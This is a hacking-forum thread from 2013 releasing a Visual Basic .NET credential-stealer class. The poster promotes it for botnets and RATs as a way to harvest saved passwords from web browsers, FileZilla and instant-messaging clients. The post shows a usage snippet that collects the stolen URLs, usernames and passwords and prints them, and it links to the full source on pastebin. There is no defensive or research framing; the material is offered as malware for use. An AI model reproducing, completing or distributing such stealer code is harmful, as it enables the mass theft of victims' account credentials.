![]() |
|
[Release] Stealer Class - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: Visual Basic & .NET Framework (https://sinister.ly/Forum-Visual-Basic-NET-Framework) +--- Thread: [Release] Stealer Class (/Thread-Release-Stealer-Class) |
[Release] Stealer Class - SQLi - 05-27-2013 Stealer Class This is a stealer class for Visual Basic .NET, it covers everything from Opera, Chrome, IE and Firefox to FileZilla, MSN, Yahoo, Paltalk and DynDNS. This is a must-have for botnets as well as RATs. I'm not the author of this script, and by the looks of it, it looks like somebody just put together a lot of sources. Either way, I do not know who the author is, I picked this up somewhere on a german forum. Usage Code: '
Dim passwords As String = A.GT()
'Alternatively, leave as is with the prefixes. Just remove the three next lines.
passwords = passwords.Replace("|URL|", vbNewLine & "Website:")
passwords = passwords.Replace("|USR|", "Username:")
passwords = passwords.Replace("|PWD|", "Password:")
Messagebox.Show(passwords)Download The code is so large I'll put it somewhere else. http://pastebin.com/raw.php?i=eUEmtQUe |